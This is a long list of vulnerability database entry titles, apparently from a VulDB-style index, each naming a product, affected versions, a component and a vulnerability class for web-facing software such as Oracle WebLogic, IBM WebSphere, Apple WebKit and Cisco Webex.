[170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability
[170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure
[170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability
[170903] Squid Web Proxy up to 4.14/5.0.5 WCCP Protocol out-of-bounds read
[170836] GLPI up to 9.5.3 Self-Service Interface authorization
[170420] Backdoor.Win32.Ketch.h Web Server buffer overflow
[170413] Backdoor.Win32.Agent.aak Web Service Port 8080 hard-coded credentials
[170403] Nagios XI up to 5.6 Web System graphtemplates.php code injection
[170304] Advantech WebAccess/SCADA up to 9.0 WADashboard external reference
[170259] Automated Logic WebCTRL up to 6.5 GET Request failuremessage.jsp cross site scripting
[170216] Digium Asterisk up to 16.16.0/17.9.1/18.2.0 WebRTC Client res_rtp_asterisk.c stack-based overflow
[170208] Sangoma Asterisk up to 16.8-cert5/16.16.0/17.9.1/18.2.0 WebRTC Client res_rtp_asterisk.c stack-based overflow
[170199] Johnson Controls Metasys Reporting Engine up to 2.1 Web Services path traversal
[170154] IBM Maximo for Civil Infrastructure 7.6.2 Web UI cross site scripting
[170152] IBM Maximo for Civil Infrastructure 7.6.2 Web UI cross site scripting
[170150] IBM WebSphere Application Server 8.0/8.5/9.0 path traversal
[170149] IBM Jazz Reporting Service 6.0.6.1/7.0/7.0.1/7.0.2 Web UI cross site scripting
[170124] Advantech WebAccess/SCADA 9.0.1 COM Server access control
[170123] Advantech WebAccess/SCADA 9.0.1 Loaded Module access control
[170122] Advantech WebAccess/SCADA 9.0.1 Services access control
[170121] Advantech WebAccess/SCADA 9.0.1 access control
[170120] Advantech WebAccess/SCADA 9.0.1 HTTP Request information disclosure
[170046] Intel Collaboration Suite for WebRTC up to 4.3.0 API control flow
[169949] Dell EMC Avamar Server 19.3/19.4 Web UI improper authorization
[169935] Nagios XI 5.7.2 Webapp Query command injection
[169923] Horde Groupware Webmail Edition up to 5.2.22 Text Filter Library Text2html.php preProcess cross site scripting
[169907] F5 BIG-IP ASM/Advanced WAF up to 12.1.x/13.1.3.5/14.1.3.0/15.1.1/16.0.1.0 Websocket resource consumption
[169795] IBM Case Manager/Business Automation Workflow Web UI cross site scripting
[169782] Teradici Cloud Access Connector up to 31 Web Form cross-site request forgery
[169781] Teradici Cloud Access Connector up to 17 Web Application Pages authentication bypass
[169700] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 xml external entity reference
[169373] OTRS Survey up to 6.0.20/7.0.19 Agent Interface cross site scripting
[169313] Redwood Report2Web 4.3.4.5/4.5.3 default.htm injection
[169312] Redwood Report2Web 4.3.4.5/4.5.3 sign.do cross site scripting
[169221] Cisco WebEx Meetings/WebEx Meetings Server Meeting Invitation Email input validation
[169205] IBM API Connect up to 10.0.1.0/2018.4.1.13 Web UI cross site scripting
[169166] Alt-N MDaemon Webmail 19.5.5 Contact List cross site scripting
[169165] Alt-N MDaemon Webmail 19.5.5 File Attachment cross site scripting
[169121] Apple macOS up to 11.1 WebRTC redirect
[169120] Apple macOS up to 11.1 WebKit unknown vulnerability
[169119] Apple macOS up to 11.1 WebKit unknown vulnerability
[169118] Apple macOS up to 11.1 WebKit type confusion
[169117] Apple macOS up to 11.1 WebKit access control
[169116] Apple macOS up to 11.1 WebKit access control
[169115] Apple macOS up to 11.1 WebKit use after free
[168877] Moodle up to 3.8.6/3.9.3/3.10.0 Web Services information disclosure
[168831] IBM Jazz Foundation Web UI cross site scripting
[168826] IBM Jazz Foundation Web UI cross site scripting
[168825] IBM Jazz Foundation Web UI cross site scripting
[168824] IBM Cloud Pak for Security 1.4.0.0 Web UI cross site scripting
[168816] IBM Jazz Foundation Web UI cross site scripting
[168727] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data xml external entity reference
[168352] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4.x Web Runtime cross site scripting
[168335] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services information disclosure
[168332] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core Components denial of service
[168329] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web Dashboards unknown vulnerability
[168328] Oracle WebLogic Server 12.2.1.3.0 Centralized Thirdparty Jars denial of service
[168326] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps cross site scripting
[168325] Oracle WebCenter Sites 12.2.1.3.0/12.2.1.4.0 cross site scripting
[168322] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services unknown vulnerability
[168321] Oracle WebLogic Server Sample apps unknown vulnerability
[168317] Oracle WebLogic Server Console unknown vulnerability
[168316] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console deserialization
[168315] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework deserialization
[168303] Oracle BI Publisher 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Web Server unknown vulnerability
[168297] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability
[168290] Oracle WebLogic Server Samples unknown vulnerability
[168289] Oracle WebLogic Server 12.1.3.0.0 Core Components unknown vulnerability
[168288] Oracle WebLogic Server 12.1.3.0.0 Core Components unknown vulnerability
[168287] Oracle WebLogic Server Core Components unknown vulnerability
[168286] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Web Services unknown vulnerability
[168285] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Core Components unusual condition
[168284] Oracle WebCenter Portal 11.1.1.9.0 Portlet Services xml external entity reference
[168235] Oracle Financial Services Market Risk Measurement and Management User Interface dynamically-determined object attributes
[168234] Oracle Financial Services Data Integration Hub 8.0.3/8.0.6 User Interface dynamically-determined object attributes
[168223] Oracle Enterprise Manager Ops Center 12.4.0.0 User Interface cryptographic issues
[168222] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps cross site scripting
[168220] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps xml external entity reference
[168184] Oracle Primavera P6 Enterprise Project Portfolio Management Web access unknown vulnerability
[168063] Atlassian FishEye/Crucible up to 4.8.4 web-inf/ file access
[168044] Juniper Junos on QFX IRB Interface denial of service
[168039] Juniper Junos 802.1X Authenticator Port Interface resource consumption
[168036] Juniper Junos J-Web information disclosure
[168004] Backdoor.Win32.Ncx.bt Web Server buffer overflow
[167945] Cisco WebEx Meetings/WebEx Meetings Server Host Key excessive authentication
[167753] IBM API Connect up to 5.0.8.10 Web UI cross site scripting
[167547] Apache DolphinScheduler up to 1.3.2 API Interface access control
[167510] IBM Jazz Foundation Web UI cross site scripting
[167509] IBM Jazz Foundation Web UI cross site scripting
[167508] IBM Jazz Foundation Web UI cross site scripting
[167447] AWBS Advanced Webhost Billing System 3.7.0 cross-site request forgery
[167352] Elementor Website Builder Plugin up to 3.0.13 on WordPress unrestricted upload
[167339] IBM WebSphere eXtreme Scale 8.6.1 URL Parameter information disclosure
[167247] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting
[167244] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting
[167243] IBM Cloud Pak System 2.3.0.1 up to 2.3.3.2 Web UI cross site scripting
[167175] Webform Report Project up to 7.x-1.x-dev on Drupal Submission /rss.xml information disclosure
[162178] IBM WebSphere Application Server 7.5/8.0/8.5/9.0 information disclosure
[162118] CMS Made Simple up to 2.2.14 moduleinterface.php cross site scripting
[161959] Apple iCloud up to 11.3 on Windows WebKit Universal cross site scripting
[161958] cPanel up to 90.0.9 Cron Editor Interface cross site scripting
[161957] cPanel up to 90.0.9 Cron Jobs interface cross site scripting
[161956] cPanel up to 90.0.9 WHM Manage API Tokens Interface cross site scripting
[161954] cPanel up to 90.0.9 WHM Edit DNS Zone Interface cross site scripting
[161953] cPanel up to 88.0.12 DNS Zone Manager DNSSEC Interface cross site scripting
[161904] Cisco IOS XE Web Server Authentication privilege escalation
[161884] Cisco IOS XE Web Management Framework privilege escalation
[161883] Cisco IOS XE Web Management Framework privilege escalation
[161878] Cisco IOS XE Web Management Framework privilege escalation
[161865] Cisco IOS XE Web UI privilege escalation
[161859] Cisco IOS XE Web Management privilege escalation
[161769] Cisco Web Security Appliance API Framework Header Injection privilege escalation
[161768] Cisco WebEx UCF File privilege escalation
[161756] Cisco IOS/IOS XE Web UI cross site request forgery
[161744] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[161743] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[161742] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[161685] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data XML External Entity
[161684] IBM WebSphere Application Server Liberty up to 20.0.0.9 oAuth/openidConnectServer denial of service
[161643] D-Link DIR-816L/DIR-803 URL Encoding webinc/js/info.php cross site scripting
[161630] Citrix ADC/Gateway/NetScaler Gateway/SD-WAN WANOP SSL VPN Web Portal cross site scripting
[161369] Apple tvOS up to 13.4.8 WebKit cross site scripting
[161365] Apple watchOS up to 6.2.8 WebKit cross site scripting
[161292] McAfee Web Gateway up to 9.2.0 Access Control privilege escalation
[161284] McAfee Web Gateway up to 9.2.0 Configuration File privilege escalation
[161283] McAfee Web Gateway up to 9.2.0 Access Control privilege escalation
[161281] McAfee Web Gateway up to 9.2.0 Access Control Password privilege escalation
[161278] IBM Business Automation Workflow 8.0/8.5/8.6 Web UI cross site scripting
[161221] GitLab up to 13.1.9/13.2.7/13.3.3 Webhook denial of service
[161195] SoftradeWeb SNC WP SMART CRM 1.8.7 on WordPress cross site scripting
[161131] Philips Patient Information Center iX Web Application cross site scripting
[161106] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting
[161087] Yaws Web Server up to 2.0.7 CGI privilege escalation
[161086] Yaws Web Server up to 2.0.7 WebDAV XML External Entity
[160988] Palo Alto PAN-OS up to 8.1.14/9.0.8/9.1.2 Authentication Interface memory corruption
[160986] Palo Alto PAN-OS up to 9.0.9/9.1.3/10.0.0 Management Interface privilege escalation
[160985] Palo Alto PAN-OS up to 8.1.15/9.0.9/9.1.2 Management Interface privilege escalation
[160981] Red Hat JBossWeb up to 7.5.31 WebSocket denial of service
[160976] IBM Business Process Manager Web UI Stored cross site scripting
[160975] IBM Business Process Manager Web UI cross site scripting
[160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation
[160753] IBM InfoSphere Information Server 11.7 Web UI Stored cross site scripting
[160743] Cisco Webex Training Meeting privilege escalation
[160670] Enghouse Web Chat 6.2.284.34 cross site scripting
[160621] Squid Web Proxy up to 4.12/5.0.3 Cache privilege escalation
[160620] Squid Web Proxy up to 4.12/5.0.3 Header Parsing privilege escalation
[160406] IBM WebSphere Application Server ND High Availability Deployment Manager cross site scripting
[160402] IBM Security Guardium Insights 2.0.1 Web Page information disclosure
[160369] Webexcels Ecommerce CMS 2.x/2017/2018/2019/2020 content.php sql injection
[160368] Webexcels Ecommerce CMS 2.x/2017/2018/2019/2020 search.php cross site scripting
[160315] IBM Security Guardium Data Encryption 3.0.0.2 Web UI cross site scripting
[160295] Etoile Web Design Ultimate Appointment Booking / Scheduling Plugin up to 1.1.9 on WordPress Reflected cross site scripting
[160212] Squid Web Proxy up to 4.12/5.0.3 Locking peer_digest.cc peerDigestHandleReply denial of service
[160103] Cisco Webex Meetings Desktop App on Windows directory traversal
[160004] Cisco Webex Meeting Contacts information disclosure
[159995] Cisco Webex Meeting Scheduled Meeting Template privilege escalation
[159994] Cisco Webex Meeting Scheduled Meeting Template privilege escalation
[159991] Cisco Unified Communications Manager Web UI cross site scripting
[159933] Siemens SICAM WEB firmware for SICAM A8000 RTU Login Screen Log cross site scripting
[159906] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 privilege escalation
[159890] Apple iCloud up to 11.2 on Windows WebKit Page Loading weak authentication
[159889] Apple iCloud up to 11.2 on Windows WebKit privilege escalation
[159888] Apple iCloud up to 11.2 on Windows WebKit memory corruption
[159887] Apple iCloud up to 11.2 on Windows WebKit memory corruption
[159886] Apple iCloud up to 11.2 on Windows WebKit Universal cross site scripting
[159885] Apple iCloud up to 11.2 on Windows WebKit CSP privilege escalation
[159884] Apple iCloud up to 11.2 on Windows WebKit memory corruption
[159870] Apple iCloud up to 7.19 on Windows WebKit Page Loading weak authentication
[159869] Apple iCloud up to 7.19 on Windows WebKit privilege escalation
[159868] Apple iCloud up to 7.19 on Windows WebKit memory corruption
[159867] Apple iCloud up to 7.19 on Windows WebKit memory corruption
[159866] Apple iCloud up to 7.19 on Windows WebKit Universal cross site scripting
[159865] Apple iCloud up to 7.19 on Windows WebKit CSP privilege escalation
[159864] Apple iCloud up to 7.19 on Windows WebKit memory corruption
[159729] BlackBerry QNX Software Development Platform up to 6.6.0 Slinger Web Server privilege escalation
[159726] SAP NetWeaver AS JAVA up to 7.50 Web Service denial of service
[159703] Artica Web Proxy 4.30.00000000 Privileges fw.login.php sql injection
[159702] Artica Web Proxy 4.30.000000 cyrus.php privilege escalation
[159639] Teradici Cloud Access Connector up to 16 Management Interface Stored cross site scripting
[159638] Teradici Cloud Access Connector up to 15 Management Interface Credentials unknown vulnerability
[159446] IBM Jazz Reporting Service 7.0/7.0.1 Web UI cross site scripting
[159445] IBM Jazz Reporting Service 6.0.2/6.0.6/6.0.6.1/7.0/7.0.1 Web UI cross site scripting
[159444] IBM Jazz Reporting Service 6.0.6/6.0.6.1/7.0 Web UI cross site scripting
[159430] SialWeb CMS Search cross site scripting
[159429] SialWeb CMS /about.php sql injection
[159379] TP-LINK TL-PS310U Web Administration weak authentication
[159360] Advantech WebAccess HMI Designer up to 2.1.9.31 privilege escalation
[159354] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption
[159353] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption
[159352] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption
[159351] Advantech WebAccess HMI Designer up to 2.1.9.31 information disclosure
[159350] Advantech WebAccess HMI Designer up to 2.1.9.31 memory corruption
[159310] IBM Jazz Foundation/Engineering Web UI cross site scripting
[159309] IBM Jazz Foundation/Engineering Web UI cross site scripting
[159306] IBM Jazz Foundation/Engineering Web UI cross site scripting
[159296] Cohesive Networks VNS3:vpn up to 4.11.0 Administrative Interface privilege escalation
[159268] IBM Financial Transaction Manager 3.2.4 Web UI cross site scripting
[158984] Parallels Remote Application Server up to 17.1.1 Web Application privilege escalation
[158875] D-Link DIR-816L webinc/js/info.php cross site scripting
[158747] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation
[158725] Cisco SD-WAN vManage Web UI XML External Entity
[158708] Cisco Webex Meetings/WebEx Meetings Server privilege escalation
[158642] Apple tvOS up to 13.4.7 WebKit Page Loading weak authentication
[158641] Apple tvOS up to 13.4.7 WebKit privilege escalation
[158640] Apple tvOS up to 13.4.7 WebKit memory corruption
[158639] Apple tvOS up to 13.4.7 WebKit memory corruption
[158638] Apple tvOS up to 13.4.7 WebKit Universal cross site scripting
[158637] Apple tvOS up to 13.4.7 WebKit Content Security Policy privilege escalation
[158636] Apple tvOS up to 13.4.7 WebKit memory corruption
[158622] Apple watchOS up to 6.2.7 WebKit Page Loading weak authentication
[158620] Apple watchOS up to 6.2.7 WebKit memory corruption
[158619] Apple watchOS up to 6.2.7 WebKit memory corruption
[158618] Apple watchOS up to 6.2.7 WebKit Universal cross site scripting
[158617] Apple watchOS up to 6.2.7 WebKit Content Security Policy privilege escalation
[158616] Apple watchOS up to 6.2.7 WebKit memory corruption
[158569] McAfee Web Gateway up to 9.2.0 privilege escalation
[158536] Moxa EDR-G902/EDR-G903 up to 5.3 Web Server memory corruption
[158355] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4 Web Runtime privilege escalation
[158327] Oracle Health Sciences Empirica Signal 7.3.3 Web server privilege escalation
[158326] Oracle Health Sciences Empirica Inspections 1.0.1.2 Web server privilege escalation
[158321] Oracle Business Intelligence Enterprise Edition 12.2.1.3.0/12.2.1.4.0 Analytics Web General information disclosure
[158319] Oracle WebLogic Server Core information disclosure
[158318] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[158315] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability
[158314] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability
[158313] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability
[158312] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps unknown vulnerability
[158311] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability
[158306] Oracle WebLogic Server Core unknown vulnerability
[158304] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Web Container unknown vulnerability
[158303] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Security Framework information disclosure
[158299] Oracle WebLogic Server Web Services information disclosure
[158298] Oracle WebLogic Server Web Container denial of service
[158297] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Sample apps information disclosure
[158296] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Sample apps information disclosure
[158295] Oracle WebCenter Portal 12.2.1.3.0 WebCenter Spaces Application privilege escalation
[158291] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability
[158290] Oracle WebLogic Server Web Container unknown vulnerability
[158284] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Composer denial of service
[158283] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web Answers denial of service
[158279] Oracle WebLogic Server Console privilege escalation
[158278] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Centralized Thirdparty Jars privilege escalation
[158277] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability
[158276] Oracle WebLogic Server Core unknown vulnerability
[158275] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability
[158274] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability
[158273] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Security Service information disclosure
[158272] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Centralized Thirdparty Jars privilege escalation
[158271] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework privilege escalation
[158258] Oracle 8.0.4 User Interface cross site scripting
[158255] Oracle Banking Platform up to 2.10.0 User Interface cross site scripting
[158254] Oracle Banking Enterprise Collections 2.7.0/2.8.0 User Interface cross site scripting
[158252] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8/8.0.9 User Interface unknown vulnerability
[158251] Oracle Financial Services Loan Loss Forecasting 8.0.6/8.0.7/8.0.8 User Interface unknown vulnerability
[158248] Oracle Financial Services Liquidity Risk Management 8.0.6 User Interface unknown vulnerability
[158242] Oracle 8.0.6/8.0.7/8.0.8 Web Service to Regulatory Report privilege escalation
[158235] Oracle Insurance Accounting Analyzer 8.0.6/8.0.7/8.0.8 User Interface cross site scripting
[158232] Oracle Financial Services Market Risk Measurement 8.0.6/8.0.8 User Interface privilege escalation
[158224] Oracle Application Testing Suite 13.2.0.1/13.3.0.1 Load Testing for Web Apps cross site scripting
[158215] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps privilege escalation
[158178] Oracle up to 16.2.20.1/17.12.17.1/18.8.18.2 Web Access unknown vulnerability
[158173] Oracle up to 17.12.17.1/18.8.19/19.12.5 Web Access unknown vulnerability
[158168] Oracle up to 19.12.6 Web Access privilege escalation
[158165] Oracle up to 16.2.20.1/17.12.17.1/18.8.19/19.12.6 Web Access XML External Entity
[158149] Oracle Communications Session Route Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting
[158147] Oracle Communications Session Report Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting
[158142] Oracle Communications Element Manager 8.1.1/8.2.0/8.2.1 User Interface cross site scripting
[158131] Oracle Communications Operations Monitor 3.4/4.1/4.2/4.3 VSP implementing webserver privilege escalation
[158117] Oracle Communications Network Integrity 7.3.2/7.3.3/7.3.4/7.3.5/7.3.6 User Interface unknown vulnerability
[158047] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting
[158043] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting
[158027] Apache Tomcat up to 7.0.104/8.5.56/9.0.36/10.0.0-M6 WebSocket Frame denial of service
[157902] Microsoft Office Online Server/Office Web Apps cross site scripting
[157771] Palo Alto PAN-OS up to 7.x/8.0.x/8.1.14 Management Interface privilege escalation
[157647] Atlassian JIRA Server/Data Center up to 8.8.0 Web Resources Manager privilege escalation
[157629] Nginx Controller up to 1.0.1/2.8.x/3.4.x User Interface weak authentication
[157596] Synacor Zimbra Collaboration Suite up to 8.8.15 Patch 10 WebMail Reflected cross site scripting
[157575] F5 BIG-IP up to 12.1.5.1/13.1.3.3/14.1.2.5/15.1.0.3 Traffic Management User Interface cross site request forgery
[157571] Nginx Controller up to 1.0.1/2.9.0/3.4.0 User Interface cross site request forgery
[157538] PowerDNS Recursor up to 4.1.16/4.2.2/4.3.1 Web Server privilege escalation
[157492] Squid Web Proxy up to 4.11/5.0.2 ContentLengthInterpreter.cc privilege escalation
[157487] Squid Web Proxy up to 5.2 Synchronization Ipc::Mem::PageStack::pop unknown vulnerability
[157486] Squid Web Proxy up to 4.11/5.0.2 Certificate Validation Helper denial of service
[157463] IBM Business Automation Workflow Web UI cross site scripting
[157334] IBM Maximo Asset Management 7.6.0.10/7.6.1.1 Web UI cross site scripting
[157204] Xiaomi Mi Jia Ink-Jet Printer up to 3.4.5 Web Management privilege escalation
[157165] OSIsoft PI Web API up to 2019 Patch 1 cross site scripting
[157113] WebFOCUS Business Intelligence 8.0 SP6 /ibi_apps/WFServlet.cfg XML External Entity
[157112] WebFOCUS Business Intelligence 8.0 WFServlet(.ibfs) cross site request forgery
[157111] WebFOCUS Business Intelligence 8.0 cross site scripting
[157040] CMS Made Simple 2.2.14 moduleinterface.php cross site scripting
[156929] Python up to 3.8.3 Lib/ipaddress.py IPv4Interface/IPv6Interface denial of service
[156911] Cisco IOS XR Gigabit Ethernet Management Interface privilege escalation
[156909] Cisco Webex Meetings/WebEx Meetings Server weak authentication
[156902] Cisco Webex Meetings Desktop App on macOS Software Update weak authentication
[156880] Cisco Webex Meetings Desktop App privilege escalation
[156732] Advantech WebAccess Node up to 8.4.4 memory corruption
[156673] IBM API Connect up to 5.0.8.8 Web UI cross site scripting
[156328] Microsoft SharePoint Foundation ASP.Net Web Control privilege escalation
[156238] IBM WebSphere Application Server 8.5/9.0 privilege escalation
[156237] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 information disclosure
[156236] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Network Deployment privilege escalation
[156131] IBM Security Guardium 11.1 Web UI cross site scripting
[156079] IBM Security Guardium 11.1 Web UI cross site scripting
[156071] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation
[156070] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation
[156069] Cisco WebEx Network Recording Player/Webex Player ARF File privilege escalation
[156046] Cisco IOS XE Web UI privilege escalation
[156012] Navigate CMS up to 2.8.7 website.class.php cross site scripting
[155996] Synacor Zimbra up to 8.8.15 Patch 9/9.0.0 Patch 2 Webmail Subsystem /service/upload privilege escalation
[155985] websocket-extensions up to 0.1.4 on Ruby Regex privilege escalation
[155805] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption
[155804] Apple iCloud up to 7.18/11.1 on Windows WebKit cross site scripting
[155803] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation
[155802] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption
[155801] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption
[155800] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation
[155799] Apple iCloud up to 7.18/11.1 on Windows WebKit Universal cross site scripting
[155798] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation
[155737] Apple tvOS up to 13.4.4 WebRTC memory corruption
[155736] Apple tvOS up to 13.4.4 WebKit privilege escalation
[155735] Apple tvOS up to 13.4.4 WebKit memory corruption
[155734] Apple tvOS up to 13.4.4 WebKit memory corruption
[155733] Apple tvOS up to 13.4.4 WebKit memory corruption
[155732] Apple tvOS up to 13.4.4 WebKit cross site scripting
[155731] Apple tvOS up to 13.4.4 WebKit privilege escalation
[155730] Apple tvOS up to 13.4.4 WebKit privilege escalation
[155729] Apple tvOS up to 13.4.4 WebKit Universal cross site scripting
[155704] Apple watchOS up to 6.2.4 WebRTC information disclosure
[155703] Apple watchOS up to 6.2.4 WebKit privilege escalation
[155702] Apple watchOS up to 6.2.4 WebKit memory corruption
[155701] Apple watchOS up to 6.2.4 WebKit memory corruption
[155700] Apple watchOS up to 6.2.4 WebKit memory corruption
[155699] Apple watchOS up to 6.2.4 WebKit cross site scripting
[155698] Apple watchOS up to 6.2.4 WebKit privilege escalation
[155697] Apple watchOS up to 6.2.4 WebKit privilege escalation
[155696] Apple watchOS up to 6.2.4 WebKit Universal cross site scripting
[155663] IBM Jazz Reporting Service 6.0.6/6.0.6.1/7.0 Web UI cross site scripting
[155643] Trend Micro InterScan Web Security Virtual Appliance 6.5 weak authentication
[155642] Trend Micro InterScan Web Security Virtual Appliance 6.5 privilege escalation
[155641] Trend Micro InterScan Web Security Virtual Appliance 6.5 information disclosure
[155433] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting
[155418] Horde Groupware Webmail Edition up to 5.2.21 Image View Stored cross site scripting
[155391] Netgear AC3000/SRS60/SRR60/RBS50Y V2.5.1.106 Administration SOAP Interface privilege escalation
[155390] Netgear AC3000/SRS60/SRR60/RBS50Y V2.5.1.106 SOAP Interface Key information disclosure
[155377] Readdle Documents App up to 6.9.6 on iOS WebSocket Server privilege escalation
[155305] IBM WebSphere Application Server 8.5 privilege escalation
[155288] Apache ActiveMQ up to 5.15.11 Webconsole Admin GUI cross site scripting
[155283] Progress MOVEit Automation Web Admin Application cross site scripting
[155237] TYPO3 CMS up to 9.5.16/10.4.1 Backend User Interface cross site request forgery
[155227] IBM Sterling B2B Integrator Standard Edition up to 6.0.3.1 Web Page Cache information disclosure
[155218] Palo Alto PAN-OS up to 7.1.x/8.1.12/9.0.6 Management Interface XML External Entity
[155216] Palo Alto PAN-OS up to 7.1.x/8.1.13/9.0.6 Management Interface privilege escalation
[155207] Palo Alto PAN-OS up to 7.1.x/8.0.20/8.1.11/9.0.5 Management Interface memory corruption
[155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption
[154971] Oracle iPlanet Web Server 7.0.x Administration Console weak encryption
[154970] Oracle iPlanet Web Server 7.0.x Administration Console privilege escalation
[154938] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal
[154937] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption
[154936] Advantech WebAccess Node up to 8.4.4/9.0.0 information disclosure
[154935] Advantech WebAccess Node up to 8.4.4/9.0.0 sql injection
[154934] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal
[154933] Advantech WebAccess Node up to 8.4.4/9.0.0 directory traversal
[154932] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption
[154925] Advantech WebAccess Node up to 8.4.4/9.0.0 memory corruption
[154879] Java-WebSocket up to 1.4.1 Certificate Validation weak authentication
[154857] Nginx Controller up to 3.3.0 Web Server Logout weak authentication
[154832] IBM WebSphere Application Liberty up to 20.0.0.4 openidconnect weak authentication
[154831] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting
[154829] Cisco ASA/Firepower Threat Defense Management Interface denial of service
[154819] Cisco FirePOWER Management Center Web UI privilege escalation
[154815] Cisco FirePOWER Management Center Web UI privilege escalation
[154800] Cisco Firepower Threat Defense Remote Management Interface denial of service
[154798] Cisco Firepower Threat Defense Management Interface privilege escalation
[154740] Synacor Zimbra 9.0 Web Client cross site scripting
[154715] OpenVPN Access Server up to 2.6.x/2.8.2 Management Interface XML Entity Expansion
[154524] IBM WebSphere Application Server/Liberty information disclosure
[154311] Squid Web Proxy up to 5.0.1 Digest Authentication Nonce handler memory corruption
[154165] IQrouter up to 3.3.1 web-panel information disclosure
[154048] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[154047] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[153830] IBM QRadar up to 7.3.3 Patch 2 Web UI cross site scripting
[153813] Cisco WebEx Network Recording Player/Webex Player ARF memory corruption
[153810] Cisco IP Phone Web Server privilege escalation
